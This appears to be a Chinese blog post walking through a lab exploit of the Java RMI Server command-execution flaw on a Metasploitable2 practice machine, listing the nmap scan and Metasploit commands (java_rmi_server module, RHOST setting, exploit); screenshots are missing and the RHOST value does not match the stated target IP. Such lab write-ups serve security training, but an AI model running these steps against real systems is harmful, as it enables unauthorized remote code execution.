您当前的位置: 首页 >  Java

星球守护者

暂无认证

  • 4浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞

星球守护者 发布时间:2021-04-03 12:25:32 ,浏览量:4

文章目录
      • 环境
      • 原理
      • 漏洞利用
          • 第一步 ,查看1099端口是否开启
          • 第二步选择漏洞库
          • 第三步 设置参数,开始攻击
          • 第四步 利用成功,
      • 摘抄

环境 主机地址Metasploitable2192.168.232.202kali-linux192.168.232.129 原理
  • Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行
漏洞利用 第一步 ,查看1099端口是否开启
Nmap –p 0-65535 192.168.232.202 

在这里插入图片描述

第二步选择漏洞库
msfconsole
search rmi
use exploit/multi/misc/java_rmi_server

在这里插入图片描述

第三步 设置参数,开始攻击
show options
Set RHOST 192.168.160.131 设置要攻击的IP
exploit

在这里插入图片描述

第四步 利用成功,

在这里插入图片描述

摘抄 帆起远航,不惧风浪,

心之所向,势不可挡

关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.3913s